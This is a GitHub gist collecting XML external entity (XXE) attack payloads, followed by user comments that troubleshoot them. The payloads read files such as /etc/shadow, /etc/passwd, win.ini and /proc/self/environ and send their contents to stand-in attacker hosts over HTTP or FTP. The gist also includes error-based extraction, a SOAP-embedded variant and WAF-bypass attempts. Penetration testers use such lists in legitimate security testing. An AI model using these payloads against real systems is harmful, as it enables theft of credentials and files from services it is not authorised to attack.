Skip to content

Instantly share code, notes, and snippets.

Last active October 8, 2024 15:20
Show Gist options
  • Save staaldraad/01415b990939494879b4 to your computer and use it in GitHub Desktop.
Save staaldraad/01415b990939494879b4 to your computer and use it in GitHub Desktop.
XXE Payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
OoB extraction
<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
OoB variation of above (seems to work better against .NET)
<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
OoB extraction
<?xml version="1.0"?>
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">
OoB extra ERROR -- Java
<?xml version="1.0"?>
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
## External dtd: ##
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
OoB extra nice
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">
File-not-found exception based extraction
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: &#x25;
<?xml version="1.0" ?>
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
Inside SOAP body
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
Untested - WAF Bypass
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"
Copy link

galaris commented Aug 10, 2017

pull request to seclist pls? :)

Copy link

Xyberonz commented Mar 2, 2020

really good~ thanks

Copy link

adamczi commented Apr 2, 2020

The <!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'> part might not work if your XML parser doesn't do URL encoding ootb (will report "incorrect url").

Copy link

@adamczi any workaround for if XML parser doesn't do URL encoding ootb ?

Copy link

adamczi commented Jul 16, 2020

@Shapa7276 haven't found, it's just that it accepts only alphanumeric stuff in there, so if you can somehow filter out special chars, it will work normally.

Copy link

Hello guys,
Firstly thank you for this job, I tried this kind of payload, i'm stuck :

Parser payload :

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://@evilServer:8000/ev.dtd">

External ev.dtd :

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

Evil server LOG :
[31/Jul/2020 13:05:07] "GET /ev.dtd HTTP/1.0" 200 -

Error message in server :

File "http://EvilServer:8000/ev.dtd", line 2
lxml.etree.XMLSyntaxError: Detected an entity reference loop, line 2, column 77

Can you help me please ?

Copy link

dozernz commented Aug 31, 2020

@staaldraad there is an error in the "OoB extra ERROR -- Java" payload - the DTD file should say "file:///nothere/%data3;" as the %payload entity doesn't exist.

Copy link

ghost commented Apr 15, 2021

Thanks it's useful

Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment